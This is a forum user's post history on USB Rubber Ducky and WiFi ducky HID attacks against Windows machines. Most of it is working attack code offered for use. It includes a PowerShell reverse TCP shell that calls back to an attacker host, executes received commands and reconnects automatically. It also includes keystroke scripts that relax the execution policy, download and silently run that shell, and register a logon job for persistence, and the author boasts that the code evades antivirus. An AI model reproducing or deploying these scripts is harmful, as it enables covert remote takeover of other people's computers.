-
Posts
17 -
Joined
-
Last visited
Posts posted by basic4
-
-
Using a Scheduled Job to make the Reverse Powershell Survive Reboot
I've added a couple of lines to the powershell ducky script that schedules the reverse shell script to re-start after boot-up and logon by the user. This now gives us connection resilience and some degree of permanence, allowing the shell to reconnect to the server around 50 secs after a logon by our hijacked user.
REM Opens a reverse shell to back to netcat on 192.168.0.29:6673
REM Downloads payload from a webserver on 192.168.0.29:80 (see PS_TCP4.ps1 script)
REM MAP UK - for WifiDucky only.
DELAY 2000
GUI
DELAY 2500
STRING powershell.exe
DELAY 800
MENU
DELAY 500
STRING a
ENTER
DELAY 1200
ALT + Y
DELAY 250
ENTER
DELAY 3000
REM first lets set the execution policy if possible
STRING Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
DELAY 50
ENTER
DELAY 750
STRING Y
DELAY 250
ENTER
DELAY 200
STRING $dirx = "C:\Users\" + [Environment]::UserName + "\Documents";
DELAY 70
ENTER
DELAY 50
STRING $fullpath = $dirx + "\PS_TCP4.ps1";
DELAY 70
ENTER
DELAY 50
STRING Invoke-WebRequest -Uri "http://192.168.0.29/PS_TCP4.ps1" -OutFile $fullpath;
DELAY 50
ENTER
REM delay here to ensure download is complete
DELAY 3500
REM finally - attempt to make the shell survive a reboot
STRING $jobtrigger = New-JobTrigger -AtLogon -RandomDelay 00:00:50
DELAY 50
ENTER
DELAY 400
STRING Register-ScheduledJob -Trigger $jobtrigger -Scriptblock{cd $dirx; ./PS_TCP4.ps1 -dest 192.168.0.29 -port 6673} -Name "NetCheckRun"
DELAY 50
ENTER
DELAY 1200
STRING cd $dirx;
ENTER
DELAY 200
STRING powershell.exe -windowstyle hidden {./PS_TCP4.ps1 -dest 192.168.0.29 -port 6673}
DELAY 100
ENTER
DELAY 200
STRING exit
ENTERUsing the command concat style outlined in illwill's script (see post above) it should be possible to 'self-write' the reverse shell script within the ducky script and circumvent the need to download the script.
-
Hi Zibri - Yes. You'd need to install the serial drivers via a script (powershell etc) to get full 2-way communication.
-
illwill - Nice that download isn't required on your script.
I think I'll make a hybrid to get a non-download one, but still retain error control and connection recovery. I've also found a way to survive target reboot. Tested it yesterday and it works on Win7. Still need to confirm it will work on Win10. I'll post it up later today.
-
WATSEE: As for the keyboard layout issue (US/UK) - I think the easiest way would be to alter the bash script to pickup a locale identifier (eg. 'MAP UK' or 'MAP US') and translate the 6-8 character differences between the two keyboard types. I had to do the same with other Arduino 'Ducky' projects I worked on. If I get time in the next few days, I'll do that and post it back here.
Edit: Looks like you'd maybe better trying something like 'setxkbmap gb' as you'd need to change both the duckpi.sh and the C file. (I wonder why the originators wrote it that way - seems a bit limited.)
-
Better to parameterise the destination address and port of the attacker machine in the powershell script. Makes things easier to change dynamically - if required.
Example : ./PS_TCP4.ps1 -dest 192.168.0.29 -port 6673
param([String]$dest,
[Int32]$port
);
while (1 -eq 1)
{
$ErrorActionPreference = 'Continue';
try
{
#attempt inital connection
$client = New-Object System.Net.Sockets.TCPClient($dest,$port);
$stream = $client.GetStream();
[byte[]]$bytes = 0..255|%{0};
$sendbytes = ([text.encoding]::ASCII).GetBytes("Client Connected..."+"`n`n" + "PS " + (pwd).Path + "> ");
$stream.Write($sendbytes,0,$sendbytes.Length);$stream.Flush();
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$recdata = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
if($recdata.StartsWith("kill-link")){ cls; $client.Close(); exit;}
try
{
#attempt to execute the received command
$sendback = (iex $recdata 2>&1 | Out-String );
$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
}
catch
{
$error[0].ToString() + $error[0].InvocationInfo.PositionMessage;
$sendback2 = "ERROR: " + $error[0].ToString() + "`n`n" + "PS " + (pwd).Path + "> ";
cls;
}
$returnbytes = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($returnbytes,0,$returnbytes.Length);$stream.Flush();
}
}
catch
{
#an initial connection error - close and wait 30 secs then retry
if($client.Connected)
{
$client.Close();
}
cls;
Start-Sleep -s 30;
}
}Obviously we'd also have to change the appropriate call in the powershell ducky script...
STRING powershell.exe -windowstyle hidden {./PS_TCP4.ps1 -dest 192.168.0.29 -port 6673}
Also, on some Win10 machines, executing powershell scripts is disabled by default. But I seem to be able to get around that with a few extra lines in the ducky script which set execution policy for the current user. So Our new ducky script would be..
REM Opens a reverse shell to back to netcat on 192.168.0.29:6673
REM Downloads payload from a webserver on 192.168.0.29:80 (see PS_TCP4.ps1 script)
DELAY 2000
GUI
DELAY 2000
STRING powershell.exe
ENTER
DELAY 3000
REM first lets set the execution policy if possible
STRING Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
DELAY 50
ENTER
DELAY 750
STRING Y
DELAY 250
ENTER
DELAY 200
STRING $dirx = "C:\Users\" + [Environment]::UserName + "\Documents";
DELAY 70
ENTER
DELAY 50
STRING $fullpath = $dirx + "\PS_TCP4.ps1";
DELAY 70
ENTER
DELAY 50
STRING Invoke-WebRequest -Uri "http://192.168.0.29/PS_TCP4.ps1" -OutFile $fullpath;
DELAY 50
ENTER
REM delay here to ensure download is complete
DELAY 3500
STRING cd $dirx;
ENTER
DELAY 100
STRING powershell.exe -windowstyle hidden {./PS_TCP4.ps1 -dest 192.168.0.29 -port 6673}
DELAY 100
ENTER
-
Hi - Are you in the UK? - If so, you need to change the key mapping when encoding your script. See international keyboards in the ducky docs.
Regards,
basic4.
-
I've used the powershell script above (PSD_TCP4.ps1) in a ducky script and it works perfectly on Win7 & 10!
Setup
Set up my 'evil server' on a Raspberry Pi3 (webserver on port 80 and netcat listening on port 6673)
The ducky script then runs on a windows 7/10 target:
1. Opens powershell on the target.
2. Downloads the reverse shell payload script.
3. Executes it thus forming a link back to netcat running on the Raspberry Pi3.
Ducky script:
REM Opens a reverse shell to back to netcat on 192.168.0.17:6673
REM Downloads payload from a webserver on 192.168.0.17:80 (see PS_TCP4.ps1 script)
DELAY 2000
GUI
DELAY 800
STRING powershell.exe
ENTER
DELAY 2000
STRING $dirx = "C:\Users\" + [Environment]::UserName + "\Documents";
DELAY 70
ENTER
DELAY 50
STRING $fullpath = $dirx + "\PS_TCP4.ps1";
DELAY 70
ENTER
DELAY 50
STRING Invoke-WebRequest -Uri "http://192.168.0.17/PS_TCP4.ps1" -OutFile $fullpath;
DELAY 50
ENTER
REM delay here to ensure download is complete
DELAY 3500
STRING cd $dirx;
ENTER
DELAY 100
STRING powershell.exe -windowstyle hidden {./PS_TCP4.ps1}
DELAY 100
ENTERConclusions
This seems to work very well and doesn't get Kaspersky's attention at all. I'm sure that the ducky script could be improved greatly. But I'm happy the proof-of-concept is sound.
-
Hi - A ducky only works if the user IS logged in AND the screen isn't locked.
Using a ducky requires that the user has walked away from the target machine without locking it. Or if you can distract the user from the screen for the amount of time needed to insert the ducky and run its script.
When a machine is locked, can you use the keyboard? (except to login) - No you need the password - which we don't know.
So a Ducky is just a tool to type commands very quickly - that's all.
Regards,
Basic4.
-
Reverse TCP Shell using Powershell Only
Hi Guys.
I was having problems getting a payload for the ducky that wasn't detected by Kaspersky, AVG etc. So I started to look into the possibility of using Powershell only to create a reverse TCP shell. I found some promising base code on a Powershell site and made some additions/adaptations for connection resilience and error handling. Now, the nice thing about this PS script is that it's compatible with a netcat listener! Should be very easy to utilize this via a ducky script on my 'WiDucky'. (Wifi enabled ducky - https://github.com/basic4/WiDucky)
Just setup a netcat listener on the attacker machine with: nc -l 6673
I've added code for the script to automatically reconnect to the attacker if connection is lost, and the script also returns shell error text to the listener too.
The Powershell Script itself (could still use some tidying up - but works perfectly as is :)
while (1 -eq 1)
{
$ErrorActionPreference = 'Continue';
try
{
#attempt inital connection
$client = New-Object System.Net.Sockets.TCPClient("192.168.0.17",6673);
$stream = $client.GetStream();
[byte[]]$bytes = 0..255|%{0};
$sendbytes = ([text.encoding]::ASCII).GetBytes("Client Connected..."+"`n`n" + "PS " + (pwd).Path + "> ");
$stream.Write($sendbytes,0,$sendbytes.Length);$stream.Flush();
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$recdata = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
if($recdata.StartsWith("kill-link")){ cls; $client.Close(); exit;}
try
{
#attempt to execute the received command
$sendback = (iex $recdata 2>&1 | Out-String );
$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
}
catch
{
$error[0].ToString() + $error[0].InvocationInfo.PositionMessage;
$sendback2 = "ERROR: " + $error[0].ToString() + "`n`n" + "PS " + (pwd).Path + "> ";
cls;
}
$returnbytes = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($returnbytes,0,$returnbytes.Length);$stream.Flush();
}
}
catch
{
#an initial connection error - close and wait 30 secs then retry
if($client.Connected)
{
$client.Close();
}
cls;
Start-Sleep -s 30;
}
}This is my first powershell script. But given how easy it was to get this working, I'm certainly going to use it more.
Regards,
Basic4.
-
See the following projects I've built around the Ducky HID attack..
https://github.com/basic4/WiDucky - Wifi Ducky with windows/Python/Android controllers.
https://github.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle - A basic ducky with microSD for under $10.
Basic4.
-
Hi
1. No ducky will work when a machine is locked. That's one of their limitations.
2. Yes - the WiDucky can just sit there and do nothing until you connect to it over WiFi - and send keystrokes.
Basic4.
-
It's all here https://github.com/basic4/WiDuck
-
-
It's a good solution. Although I built a wifi ducky based on arduino boards and the ESP8266, since combining both gave the possibility of full speed USB and multiple end points. I built prototypes and used these until I found the 'Cactus Micro' , which is a combination of a Leonardo and ESP8266. Wrote various controllers for Python, .NET and Android. Works well. Since the Atmel chip is recognized as both a HID device and a Serial port, You can (via a script) run command prompt in a windows target, and return the output of the script (via serial) to the duck and then on back to the attacker machine! Can supply the code if you're interested.
-
Did this around a year back. Works just like a ducky only via wifi. I wrote a control app and script parser in C#, one in android (very useful) and another in Python. Since the 'controller' sends the keystrokes, interactive scripts are possible. Built 3 prototypes (differing hardware) but the smallest is the best.
The Bash Bunny is coming
in Bash Bunny
Posted
Wifi Rubber Ducky with file download capability maybe?